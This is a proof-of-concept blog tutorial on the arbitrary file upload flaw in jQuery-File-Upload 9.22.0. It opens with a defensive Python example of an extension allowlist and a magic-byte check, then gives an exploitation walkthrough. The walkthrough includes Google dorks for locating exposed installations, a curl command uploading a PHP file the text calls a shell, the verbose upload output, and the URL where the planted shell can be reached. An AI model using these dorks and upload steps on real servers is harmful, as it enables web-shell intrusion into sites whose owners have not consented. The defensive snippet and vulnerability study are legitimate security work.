Proof of Concept: jQuery File Upload - Arbitrary File Upload Vulnerability


In this post I want to discuss the vulnerability in jQuery-File-Upload version 9.22.0.

The flaw in UploadHandler.php is that it performs no validation at all before storing an uploaded file on the server. There is also no restriction on which file types may be uploaded. This allows an attacker to upload a backdoor file to the server without hindrance.
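The check that 9.22.0 lacks is the extension allowlist behind the handler's accept_file_type option: the default there matched every name, and the fix replaced it with an image-only pattern. The following is an added example, not the project's own code: it mirrors that extension test in Python (the project's patterns are PCRE, but these two work unchanged with Python's re) and adds a magic-byte check of the file body, which is an assumption beyond what the project does.

```python
import re

# Default accept_file_type patterns from the project's UploadHandler.php.
ACCEPT_ANY_9_22_0 = r".+$"                   # 9.22.0 default: every filename matches
ACCEPT_IMAGES_ONLY = r"\.(gif|jpe?g|png)$"   # allowlist introduced in the fix

# Constructed table (not project code): magic bytes for the allowlisted image types.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def name_accepted(filename: str, accept_file_type: str) -> bool:
    """Mirror of the extension test UploadHandler.php performs with accept_file_type."""
    return re.search(accept_file_type, filename, re.IGNORECASE) is not None


def content_matches_extension(filename: str, data: bytes) -> bool:
    """Extra check (assumption, not in the project): body must start with the
    magic bytes of the extension it claims."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return any(data.startswith(m) for m in MAGIC.get(ext, ()))


def upload_allowed(filename: str, data: bytes,
                   accept_file_type: str = ACCEPT_IMAGES_ONLY) -> bool:
    """Both the hardened name check and the content check must pass."""
    return name_accepted(filename, accept_file_type) and \
        content_matches_extension(filename, data)


if __name__ == "__main__":
    # Constructed samples: the PHP file from the write-up and a minimal PNG header.
    php_body = b"<?php echo 'x'; ?>"
    png_body = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(name_accepted("msvfm.php", ACCEPT_ANY_9_22_0))   # True: 9.22.0 accepts anything
    print(upload_allowed("msvfm.php", php_body))           # False: extension rejected
    print(upload_allowed("photo.png", png_body))           # True
    print(upload_allowed("photo.png", php_body))           # False: name ok, body is not a PNG
```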

Exploiting jQuery File Upload

Dork
inurl:/jquery-file-upload/server/php/
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/assets/plugins/jquery-file-upload/
Exploit
http://localhost.com/[path]/jQuery-File-Upload/server/php/

The plugin location may differ; just adjust the path accordingly.

If a message like that appears, the target is likely vulnerable and we can move on to the next step.

curl -F "files=@msvfm.php" http://localhost.com/jQuery-File-Upload/server/php/ -v


curl -F "files=@msvfm.php" http://localhost:8080/jQuery-File-Upload/server/php/ -v
* Host localhost:8080 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:8080...
* connect to ::1 port 8080 from ::1 port 52922 failed: Connection refused
*   Trying 127.0.0.1:8080...
* Connected to localhost (127.0.0.1) port 8080
> POST /jQuery-File-Upload/server/php/ HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/8.6.0
> Accept: */*
> Content-Length: 15538
> Content-Type: multipart/form-data; boundary=------------------------yQskUl32nhudBKqhsoAMZE
>
* We are completely uploaded and fine
< HTTP/1.1 200 OK
< Host: localhost:8080
< Date: Thu, 21 Mar 2024 08:01:51 GMT
< Connection: close
< X-Powered-By: PHP/8.2.8
< Content-type: text/html; charset=UTF-8
<
* Closing connection
{"files":[{"name":"msvfm.php","size":15324,"type":"application\/octet-stream","url":"http:\/\/localhost:8080\/jQuery-File-Upload\/server\/php\/files\/msvfm.php","deleteUrl":"http:\/\/localhost:8080\/jQuery-File-Upload\/server\/php\/?file=msvfm.php","deleteType":"DELETE"}]}


The shell can then be accessed at:

http://localhost.com/[path]/jQuery-File-Upload/server/php/files/msvfm.php


That is all for this tutorial.
